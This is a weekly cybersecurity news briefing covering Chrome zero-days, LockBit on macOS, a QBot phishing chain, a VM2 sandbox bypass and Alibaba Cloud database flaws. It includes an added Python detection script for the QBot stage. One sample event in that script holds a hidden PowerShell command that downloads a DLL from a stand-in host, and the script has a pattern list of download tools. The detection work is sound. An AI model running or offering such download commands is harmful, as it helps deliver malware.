Cyber Security Weekly Briefing, 15 – 21 April

Telefónica Tech    21 April, 2023

Google fixes two new actively exploited 0-day vulnerabilities

Google has issued new security advisories on the identification of 0-day vulnerabilities affecting the Chrome browser that are being actively exploited.

The first flaw is tracked as CVE-2023-2033. It stems from a bug in Chrome's V8 JavaScript engine that could allow a malicious actor to exploit it remotely via a specially crafted HTML page.

The second flaw, CVE-2023-2136, lies in the cross-platform 2D graphics library Skia and, if exploited, could lead to incorrect graphics rendering, memory corruption or remote code execution resulting in unauthorised system access.


LockBit samples found targeting macOS systems

MalwareHunterTeam has found a sample LockBit file that contains the ability to infect multiple operating systems, including, for the first time, Apple’s macOS.

MalwareHunterTeam highlights that this is a remarkable milestone as it is also the first time that one of the major ransomware groups has been known to create malware specifically targeting macOS.

The file found includes an encryptor called ‘locker_Apple_M1_64’, for newer Apple devices, and another for PowerPC CPUs, used by older macOS.

An in-depth analysis of the file shows that this is so far an early version of the LockBit strain that could not be used in a real attack, but it signals the group's interest in attacking macOS devices in the near future.


New QBot campaign identified

Security researchers have published an analysis of the TTPs used in a new campaign of the well-known QBot malware, which now reaches victims through PDF files and Windows Script Files (WSF).

This phishing campaign is distributed via emails that use legitimate email threads and contain an attached PDF file that, when opened, will download a ZIP file containing a WSF file. This file ultimately aims to execute a PowerShell script, which attempts to download a QBot DLL.

It is worth noting that numerous actors such as BlackBasta, REvil, PwndLocker, Egregor, ProLock and MegaCortex have used QBot for initial access to corporate networks.

Once that initial access is established, QBot deploys additional payloads such as Cobalt Strike, Brute Ratel and other malware that give the actors access to the compromised device.
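As an added defensive illustration (not code from the briefing or the cited research), the following Python flags the WSF-to-PowerShell download step of the chain described above when run over process-creation events. The event field names, file names and URLs are constructed assumptions, not indicators from the campaign.

```python
"""Flag the WSF -> PowerShell -> download stage over process-creation events."""
import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Cmdlets and tools commonly used by a script to fetch a second-stage payload.
DOWNLOAD_MARKERS = re.compile(
    r"invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|\biwr\b|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)

# Constructed sample events (Sysmon-like fields, simplified); hypothetical values.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "command_line": "firefox.exe https://example.invalid/doc.zip"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\u\Downloads\Scan_0417.wsf"'},
    {"parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/a.png -OutFile C:\ProgramData\a.dll"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Process"},
]


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (rule_id, severity) when the event matches a stage of the chain, else None."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    # Stage 1: a script host launched on a .wsf file (the attachment's extracted payload).
    if image in SCRIPT_HOSTS and re.search(r"\.wsf\b", cmd, re.IGNORECASE):
        return ("wsf_script_host", "medium")
    # Stage 2: PowerShell spawned by that script host, especially when it downloads something.
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        if DOWNLOAD_MARKERS.search(cmd):
            return ("script_host_powershell_download", "high")
        return ("script_host_powershell", "medium")
    return None


def scan(events):
    """Return (index, rule_id, severity) for every event that matches a rule."""
    hits = []
    for index, event in enumerate(events):
        hit = classify(event)
        if hit is not None:
            hits.append((index, hit[0], hit[1]))
    return hits
```

Interactive PowerShell launched from Explorer (the last sample) is deliberately not flagged, so the rule keys on the script-host parent rather than on PowerShell alone.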


New PoC enables VM2 sandbox bypassing

Security researchers have released a new PoC capable of bypassing the VM2 sandbox, widely used in the development and security world to run and test untrusted code in an isolated environment.

This bypass would allow malware to run outside the constraints of the sandbox environment. The first vulnerability, CVE-2023-29017, was identified a fortnight ago, and the two most recent ones are tracked as CVE-2023-29199 and CVE-2023-30547.

The latter vulnerability, with a CVSS of 9.8, can be exploited by malicious actors due to a sanitisation flaw that allows the attacker to throw a host exception inside “handleException()”.

Users are advised to upgrade to version 3.9.17 as soon as possible to avoid a potential security incident.


Critical Vulnerabilities in Alibaba Cloud PostgreSQL Databases

Security researchers at Wiz have published a paper disclosing two critical vulnerabilities in Alibaba Cloud’s PostgreSQL databases.

According to the researchers, these flaws allowed unauthorised access to Alibaba Cloud customers’ PostgreSQL databases, which could lead to a supply chain attack and remote code execution.

It should be noted that the vulnerabilities, collectively named BrokenSesame, were reported to Alibaba Cloud in December 2022, and mitigations were deployed on 12 April; there is no evidence of exploitation.

In summary, one flaw allows privilege escalation in AnalyticDB and the other allows remote code execution in ApsaraDB RDS.


Featured photo: Clark van der Beken / Unsplash